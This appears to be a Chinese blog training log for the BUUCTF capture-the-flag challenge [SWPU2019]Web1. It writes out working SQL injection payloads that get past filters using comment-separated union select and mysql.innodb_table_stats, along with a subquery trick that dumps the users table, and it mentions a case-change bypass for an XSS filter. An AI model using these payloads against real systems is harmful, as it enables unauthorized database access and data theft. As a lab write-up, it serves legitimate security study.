首页 > 其他分享 >[BUUCTF]第十二天训练日志

[BUUCTF]第十二天训练日志

时间:2022-10-31 10:02:59浏览次数:49  
标签:BUUCTF 第十二天 union 19 table 20 日志 select SWPU2019


文章目录

  • ​​[SWPU2019]Web1​​

[SWPU2019]Web1

首先注册一个​​admin​​​用户提示已经被注册,估计要伪造admin身份了,发布广告那一页​​<script>alert(1);</scirpt>​​现实被过滤了,试试大小写,成功了,啊这,快乐

[BUUCTF]第十二天训练日志_sql注入


看到上面的id参数总觉得是sql注入,怀疑环境出问题了,烦

[BUUCTF]第十二天训练日志_mysql_02


啊这,看了别人的wp才知道,注入点不是url,是标题栏,然后通过union select发现注入位是第2和第3位,禁用了​​information_schema.tables​​​,查表名​​-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22​​​ 通过子查询​​-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'​


标签:BUUCTF,第十二天,union,19,table,20,日志,select,SWPU2019
From: https://blog.51cto.com/u_15847702/5808290

相关文章

  • [BUUCTF]第三天训练日志
    文章目录​​[GKCTF2020]EZ三剑客-EzWeb​​​​[FBCTF2019]RCEService​​​​[BSidesCF2019]Kookie​​​​[CISCN2019华北赛区Day1Web5]CyberPunk​​​​[极客大挑......
  • [BUUCTF]第一天训练
    文章目录​​[BSidesCF2019]Futurella​​​​[BJDCTF2nd]duangShell​​​​反弹姿势1(未成功)​​​​反弹姿势2​​[BSidesCF2019]Futurella好久没看过这么简单的题目......
  • Linux文件系统与日志分析
     inode结构表每个文件的属性信息,比如:文件的大小,时间,类型,权限等,称为文件的元数据(metadata)元数据是存放在inode(indexnode)表中。inode表中有很多条记录组成,第一条记......
  • hadoop 日志存放位置
    初学者运行MapReduce作业时,经常会遇到各种错误,由于缺乏经验,往往不知所云,一般直接将终端打印的错误贴到搜索引擎上查找,以借鉴前人的经验。然而,对于hadoop而言,当遇到错误时,第......
  • 「MySQL高级篇」MySQL日志、事务原理 -- undolog、redolog、binlog、两阶段提交
    引言日志日志,在我们平时开发中主要的用途在于监控、备份,但在MySQL中,日志的功能远远不止这些,分别有用于记录的慢查询日志,回滚版本的undolog,宕机恢复的redolog、全量备份的bin......
  • 日志分析系统ELK(elasticsearch+logstash+kibana+filebeat)
    目录​​ 一、安装es​​​​ 二、安装Logstash​​​​三、安装Kibana​​​​四、安装Filebeat​​​​五、集群模式​​搭建日志分析系统ELK(elasticsearch+logstash+k......
  • 用SQL查Linux日志工具-q
    概述Linux文本查找命令不要太多:tail、head、cat、sed、more、less、awk,但对新手不友好。q是一个命令行工具,允许在任意文件或查询结果,如​​ps-ef​​​查询进程命令的结果......
  • spdlog日志库源码:logger类
    目录特性类图关系logger数据成员logger函数成员构造与析构构造函数拷贝构造、移动构造交换操作log()记录日志消息格式串普通字符串日志级别宽字符支持sink_it_:将log消息交......
  • ELK部署-实现Nginx日志收集
    一、部署ES1、创建网络下载镜像dockernetworkcreateelasticdockerpullelasticsearch:7.17.62、目录准备mkdir/opt/ELK/elastic/{data,config}-pchmod777/o......
  • 用shell脚本巧解日志文件塞满磁盘导致系统挂起的困惑
    作者:田逸(formyz​)出事了,十万火急​一帮可爱的程序员,写的程序没有规划,程序、代码与日志一锅粥,而且都在某云的系统盘,不光生成的文件多,而且不做处理。有一天,来了个十万火急的求......